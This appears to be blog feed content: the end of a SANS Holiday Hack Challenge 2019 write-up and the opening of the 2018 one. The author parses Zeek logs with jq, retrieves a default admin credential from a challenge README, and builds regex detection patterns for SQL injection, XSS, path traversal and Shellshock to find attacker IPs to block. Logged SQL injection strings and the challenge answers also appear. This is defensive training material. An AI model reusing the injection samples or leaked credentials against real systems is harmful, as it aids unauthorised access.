&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;-r nessus&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;admin&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;admin&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;q1ki9&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;6666&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;6666&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;6666&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;&amp;#39; or &amp;#39;1=1&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;&amp;#39; or &amp;#39;1=1&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;&amp;#39; or &amp;#39;1=1&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;&amp;#39; or &amp;#39;1=1&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;root&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;comcomcom&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;(empty)&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;(empty)&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;(empty)&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;admin&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;(empty)&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Well, we can see the SQL injection attempts, but no useful credentials. Then,
I looked back at what was said in the quick start guide: the credentials are in
a readme file. So, let's look for readme files in the Zeek logs:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; jq &lt;span class="s1"&gt;&amp;#39;.[] | select(.uri | test(&amp;quot;readme&amp;quot;; &amp;quot;i&amp;quot;)) | {host, uri, status_code}&amp;#39;&lt;/span&gt; http.log
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;host&amp;quot;: &amp;quot;srf.elfu.org&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;uri&amp;quot;: &amp;quot;/README.md&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;status_code&amp;quot;: 200&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;host&amp;quot;: &amp;quot;srf.elfu.org&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;uri&amp;quot;: &amp;quot;/README/&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;status_code&amp;quot;: 404&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;host&amp;quot;: &amp;quot;srf.elfu.org&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;uri&amp;quot;: &amp;quot;/cgi-bin/README.TXT&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;status_code&amp;quot;: 404&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;There's only one entry with an HTTP status code of 200. Let's try to download
the file &lt;a class="reference external" href="https://srf.elfu.org/README.md"&gt;https://srf.elfu.org/README.md&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;# Sled-O-Matic - Sleigh Route Finder Web API

### Installation

```
sudo apt install python3-pip
sudo python3 -m pip install -r requirements.txt
```

#### Running:

`python3 ./srfweb.py`

#### Logging in:

You can login using the default admin pass:

&lt;span class="hll"&gt;`admin 924158F9522B3744F5FCD4D10FAC4356`
&lt;/span&gt;
However, it&amp;#39;s recommended to change this in the sqlite db to something custom
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hurray, we have our credentials! Now we just have to find the malicious IP
addresses to block.&lt;/p&gt;
&lt;p&gt;By taking a look at the logs, we can search for the following terms for the
different attacks:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;For SQLi : &lt;code&gt;SELECT&lt;/code&gt; and &lt;code&gt;or&amp;nbsp;​&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;For XSS : &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;For LFI : &lt;code&gt;/etc&lt;/code&gt;, &lt;code&gt;../&lt;/code&gt;, and &lt;code&gt;./.&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;For Shell-shock : &lt;code&gt;()&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We'll look for these values in the &lt;code&gt;uri&lt;/code&gt;, &lt;code&gt;user_agent&lt;/code&gt;,
&lt;code&gt;username&lt;/code&gt;, and &lt;code&gt;host&lt;/code&gt; attributes:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; jq &lt;span class="s1"&gt;&amp;#39;.[] | select((.uri,.user_agent,.username,.host | test(&amp;quot;SELECT|&amp;lt;script&amp;gt;|\\(\\)|\\.\\./|\\./\\.|/etc|or &amp;quot;)))&amp;#39;&lt;/span&gt; http.log &amp;gt; attacks.json
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see our regexp that we had to escape the &lt;code&gt;()&lt;/code&gt; and the &lt;code&gt;.&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Alright, how many different IP addresses is that?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep id.orig_h attacks.json &lt;span class="p"&gt;|&lt;/span&gt; sort -u &lt;span class="p"&gt;|&lt;/span&gt; wc -l
&lt;span class="go"&gt;62&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, pretty far from the 100 necessary IP addresses. Wunorse Openslae advises
us to look at the attributes of known bad events. Maybe we can try to identify
other bad IP addresses by using the known bad user agents: it's possible that
a known bad agent is using several IP addresses. We can try to identify them
by their user agents.&lt;/p&gt;
&lt;p&gt;First, let's create a list of known bad user agents. We'll remove user agents
that were used to perform attacks such as SQL injections or Shell-shock.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep user_agent attacks.json &lt;span class="p"&gt;|&lt;/span&gt; cut -d: -f &lt;span class="m"&gt;2&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; cut -d&lt;span class="s1"&gt;&amp;#39;&amp;quot;&amp;#39;&lt;/span&gt; -f &lt;span class="m"&gt;2&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; sort -u &lt;span class="p"&gt;|&lt;/span&gt; grep -vE &lt;span class="s1"&gt;&amp;#39;SELECT|\(\)|google&amp;#39;&lt;/span&gt; &amp;gt; bad_user_agents.txt
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, let's query our events matching our bad user agents:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="nb"&gt;read&lt;/span&gt; user_agent&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do&lt;/span&gt; jq &lt;span class="s1"&gt;&amp;#39;.[] | select(.user_agent == &amp;quot;&amp;#39;&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="nv"&gt;$user_agent&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;quot;)&amp;#39;&lt;/span&gt; http.log&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done&lt;/span&gt; &amp;lt; bad_user_agents.txt &amp;gt; malicious_events_by_user_agents.json
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, let's extract our unique IP addresses:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; cat attacks.json malicious_events_by_user_agents.json&lt;span class="p"&gt;|&lt;/span&gt; jq -s &lt;span class="s1"&gt;&amp;#39;.[] | .&amp;quot;id.orig_h&amp;quot;&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; sort -u &lt;span class="p"&gt;|&lt;/span&gt; tr -d &lt;span class="s1"&gt;&amp;#39;&amp;quot;&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;0.216.249.31&lt;/span&gt;
&lt;span class="go"&gt;10.122.158.57&lt;/span&gt;
&lt;span class="go"&gt;10.155.246.29&lt;/span&gt;
&lt;span class="go"&gt;102.143.16.184&lt;/span&gt;
&lt;span class="go"&gt;103.235.93.133&lt;/span&gt;
&lt;span class="go"&gt;104.179.109.113&lt;/span&gt;
&lt;span class="go"&gt;106.132.195.153&lt;/span&gt;
&lt;span class="go"&gt;106.93.213.219&lt;/span&gt;
&lt;span class="go"&gt;111.81.145.191&lt;/span&gt;
&lt;span class="go"&gt;116.116.98.205&lt;/span&gt;
&lt;span class="go"&gt;118.196.230.170&lt;/span&gt;
&lt;span class="go"&gt;118.26.57.38&lt;/span&gt;
&lt;span class="go"&gt;121.144.25.34&lt;/span&gt;
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can now paste our list of IPs to the SRF web site:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; cat attacks.json malicious_events_by_user_agents_bad_regexp.json&lt;span class="p"&gt;|&lt;/span&gt; jq -s &lt;span class="s1"&gt;&amp;#39;.[] | .&amp;quot;id.orig_h&amp;quot;&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; sort -u &lt;span class="p"&gt;|&lt;/span&gt; tr -d &lt;span class="s1"&gt;&amp;#39;&amp;quot;&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; paste -s -d,
&lt;span class="go"&gt;0.216.249.31,10.122.158.57,10.155.246.29,102.143.16.184,103.235.93.133,104.179.109.113,106.132.195.153,106.93.213.219,111.81.145.191,116.116.98.205,118.196.230.170,118.26.57.38,121.144.25.34,121.7.186.163,123.127.233.97,126.102.12.53,129.121.121.48,131.186.145.73,13.39.153.254,135.203.243.43,135.32.99.116,136.59.204.152,140.60.154.239[...]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We submit it, aaaand:&lt;/p&gt;
&lt;img alt="srf_route_id.png" class="align-center" src="/images/sans-christmas-challenge-2019/srf_route_id.png" /&gt;
&lt;p&gt;We get a correct route ID!&lt;/p&gt;
&lt;p&gt;Now, during the write-up, I tried submitting the exact same IP list, and it
didn't work, soooo whaddup SANS?&lt;/p&gt;
&lt;p&gt;Anyway, we can now access the Bell Tower:&lt;/p&gt;
&lt;img alt="santa.png" class="align-center" src="/images/sans-christmas-challenge-2019/santa.png" /&gt;
&lt;p&gt;&lt;em&gt;Santa says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;You did it! Thank you! You uncovered the sinister plot to destroy the
holiday season!&lt;/p&gt;
&lt;p&gt;Through your diligent efforts, we’ve brought the Tooth Fairy to justice and
saved the holidays!&lt;/p&gt;
&lt;p&gt;Ho Ho Ho!&lt;/p&gt;
&lt;p&gt;The more I laugh, the more I fill with glee.&lt;/p&gt;
&lt;p&gt;And the more the glee,&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://www.youtube.com/watch?v=yNHRXNvFmZ8"&gt;The more I'm a merrier me!&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Merry Christmas and Happy Holidays.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;img alt="small_krampus.png" class="align-center" src="/images/sans-christmas-challenge-2019/small_krampus.png" /&gt;
&lt;p&gt;&lt;em&gt;Krampus says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Congratulations on a job well done!&lt;/p&gt;
&lt;p&gt;Oh, by the way, I won the Frido Sleigh contest.&lt;/p&gt;
&lt;p&gt;I got 31.8% of the prizes, though I'll have to figure that out.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;img alt="toothfairy_orange.png" class="align-center" src="/images/sans-christmas-challenge-2019/toothfairy_orange.png" /&gt;
&lt;p&gt;&lt;em&gt;The Tooth Fairy says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;You foiled my dastardly plan! I’m ruined!&lt;/p&gt;
&lt;p&gt;And I would have gotten away with it too, if it weren't for you meddling
kids!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And, what is that we can see &lt;a class="reference external" href="https://downloads.elfu.org/LetterOfWintryMagic.pdf"&gt;in the corner&lt;/a&gt;...
Why, it's the letter of wintry magic we found during our reconnaissance of the
elfu.org domain! Here's what it says:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Thankfully, I didn’t have to implement my plan by myself! Jack Frost&lt;/p&gt;
&lt;p&gt;promised to use his wintry magic to help me subvert Santa’s horrible reign&lt;/p&gt;
&lt;p&gt;of holiday merriment NOW and FOREVER!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Oh my, sounds like things aren't over yet...&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id43"&gt;Conclusion&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Well, that's it for this year's challenge! It was a ton of fun, with some
unexpected tasks, like cutting a key, and such. This year's challenge was
clearly designed to show the blue-team side of the equation, which is kind of
neat since it's not frequently shown in online challenges.&lt;/p&gt;
&lt;p&gt;Thanks a lot for the SANS team for a Supercalifragilisticexpialidocious
Christmas challenge, and see you next year!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="answer-to-the-questions"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id44"&gt;Answer to the questions&lt;/a&gt;&lt;/h2&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;Someone sent a threatening letter to Elf University. What is the first word
in ALL CAPS in the subject line of the letter? Please find the letter in the
Quad.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The word is &lt;code&gt;DEMAND&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="2"&gt;
&lt;li&gt;We're seeing attacks against the Elf U domain! Using the &lt;a class="reference external" href="/docs/sans-christmas-challenge-2019/Security.evtx.zip"&gt;event log data&lt;/a&gt;,
identify the user account that the attacker compromised using a password
spray attack.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The account compromised during the password spray attack is &lt;code&gt;supatree&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="3"&gt;
&lt;li&gt;Using &lt;a class="reference external" href="/docs/sans-christmas-challenge-2019/sysmon-data.json.zip"&gt;these normalized Sysmon logs&lt;/a&gt;,
identify the tool the attacker used to retrieve domain password hashes from
the lsass.exe process.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The attacker used the &lt;code&gt;ntdsutil&lt;/code&gt; program to extract hashes.&lt;/p&gt;
&lt;ol class="arabic simple" start="4"&gt;
&lt;li&gt;The attacks don't stop! Can you help identify the IP address of the
malware-infected system using these &lt;a class="reference external" href="https://downloads.elfu.org/elfu-zeeklogs.zip"&gt;Zeek logs&lt;/a&gt;?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The IP address of the infected computer is &lt;code&gt;192.168.134.130&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="5"&gt;
&lt;li&gt;Access &lt;a class="reference external" href="https://splunk.elfu.org/"&gt;https://splunk.elfu.org/&lt;/a&gt; as &lt;code&gt;elf&lt;/code&gt; with password
&lt;code&gt;elfsocks&lt;/code&gt;. What was the message for Kent that the adversary embedded
in this attack? The SOC folks at that link will help you along!&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The message left for Kent was &lt;code&gt;Kent you are so unfair. And we were going
to make you the king of the Winter Carnival.&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="6"&gt;
&lt;li&gt;Gain access to the steam tunnels. Who took the turtle doves? Please tell us
their first and last name.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The turtle doves were taken by &lt;code&gt;Krampus Hollyfeld&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="7"&gt;
&lt;li&gt;Help Krampus beat the &lt;a class="reference external" href="https://fridosleigh.com/"&gt;Frido Sleigh contest&lt;/a&gt;.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Well, I did, and got the code &lt;code&gt;8Ia8LiZEwvyZr2WO&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="8"&gt;
&lt;li&gt;Gain access to the data on the &lt;a class="reference external" href="https://studentportal.elfu.org/"&gt;Student Portal&lt;/a&gt;
server and retrieve the paper scraps hosted there. What is the name of
Santa's cutting-edge sleigh guidance system?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Santa's seligh guidance system is called &lt;code&gt;Super Sled-o-matic&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic" start="9"&gt;
&lt;li&gt;&lt;p class="first"&gt;The Elfscrow Crypto tool is a vital asset used at Elf University for
encrypting SUPER SECRET documents. We can't send you the source, but we do
have debug symbols that you can use.&lt;/p&gt;
&lt;p&gt;Recover the plaintext content for this encrypted document. We know that it
was encrypted on December 6, 2019, between 7pm and 9pm UTC.&lt;/p&gt;
&lt;p&gt;What is the middle line on the cover page? (Hint: it's five words)&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The middle line is &lt;code&gt;Machine Learning Sleigh Route Finder&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="10"&gt;
&lt;li&gt;Visit Shinny Upatree in the Student Union and help solve their problem.
What is written on the paper you retrieve for Shinny?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The name of this year's villain is written, &lt;code&gt;The Tooth Fairy&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="11"&gt;
&lt;li&gt;Use the data supplied in the Zeek JSON logs to identify the IP addresses of
attackers poisoning Santa's flight mapping software. &lt;a class="reference external" href="https://srf.elfu.org/"&gt;Block the 100
offending sources of information to guide Santa's sleigh&lt;/a&gt;
through the attack. Submit the Route ID (&amp;quot;RID&amp;quot;) success value that you're
given.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The Route ID is &lt;code&gt;0807198508261964&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
</content></entry><entry><title>SANS Christmas Challenge 2018</title><link href="https://allyourbase.utouch.fr/posts/2019/01/14/sans-christmas-challenge-2018/" rel="alternate"></link><published>2019-01-14T00:00:00+01:00</published><updated>2019-01-14T00:00:00+01:00</updated><author><name>useless</name></author><id>tag:allyourbase.utouch.fr,2019-01-14:/posts/2019/01/14/sans-christmas-challenge-2018/</id><summary type="html">&lt;img alt="sans_christmas_challenge_2018_logo.png" class="align-center" src="/images/sans-christmas-challenge-2018/sans_christmas_challenge_2018_logo.png" /&gt;
&lt;p&gt;🎵 I'm dreaming of a pwned Christmaaaaas 🎵 As usual, here's my write-up
for the &lt;a class="reference external" href="https://holidayhackchallenge.com/2018/story.html"&gt;2018 SANS Christmas Challenge&lt;/a&gt;.&lt;/p&gt;
&lt;div class="contents topic" id="table-of-contents"&gt;
&lt;p class="topic-title"&gt;Table of contents&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;a class="reference internal" href="#introduction" id="id5"&gt;Introduction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#orientation-challenge" id="id6"&gt;Orientation Challenge&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#bushy-evergreen-s-cranberry-pi-challenge" id="id7"&gt;Bushy Evergreen's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#kringlecon-holiday-hack-history-questions" id="id8"&gt;KringleCon Holiday Hack History questions&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#directory-browsing" id="id9"&gt;Directory Browsing&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#minty-candycane-s-cranberry-pi-challenge" id="id10"&gt;Minty Candycane's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#analyzing-the-kringlecon-cfp-website" id="id11"&gt;Analyzing the KringleCon CFP website&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#de-bruijn-sequences" id="id12"&gt;de Bruijn Sequences&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#tangle-coalbox-s-cranberry-pi-challenge" id="id13"&gt;Tangle Coalbox's …&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</summary><content type="html">&lt;img alt="sans_christmas_challenge_2018_logo.png" class="align-center" src="/images/sans-christmas-challenge-2018/sans_christmas_challenge_2018_logo.png" /&gt;
&lt;p&gt;🎵 I'm dreaming of a pwned Christmaaaaas 🎵 As usual, here's my write-up
for the &lt;a class="reference external" href="https://holidayhackchallenge.com/2018/story.html"&gt;2018 SANS Christmas Challenge&lt;/a&gt;.&lt;/p&gt;
&lt;div class="contents topic" id="table-of-contents"&gt;
&lt;p class="topic-title"&gt;Table of contents&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;a class="reference internal" href="#introduction" id="id5"&gt;Introduction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#orientation-challenge" id="id6"&gt;Orientation Challenge&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#bushy-evergreen-s-cranberry-pi-challenge" id="id7"&gt;Bushy Evergreen's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#kringlecon-holiday-hack-history-questions" id="id8"&gt;KringleCon Holiday Hack History questions&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#directory-browsing" id="id9"&gt;Directory Browsing&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#minty-candycane-s-cranberry-pi-challenge" id="id10"&gt;Minty Candycane's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#analyzing-the-kringlecon-cfp-website" id="id11"&gt;Analyzing the KringleCon CFP website&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#de-bruijn-sequences" id="id12"&gt;de Bruijn Sequences&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#tangle-coalbox-s-cranberry-pi-challenge" id="id13"&gt;Tangle Coalbox's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#kringlecon-speaker-unpreparedness-room" id="id14"&gt;KringleCon Speaker Unpreparedness room&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#yannick-s-dirty-solution" id="id15"&gt;Yannick's (dirty) solution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#the-official-solution" id="id16"&gt;The &amp;quot;official&amp;quot; solution&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#data-repo-analysis" id="id17"&gt;Data Repo Analysis&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#wunorse-openslae-s-cranberry-pi-challenge" id="id18"&gt;Wunorse Openslae's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#north-pole-git-repository" id="id19"&gt;North Pole Git Repository&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
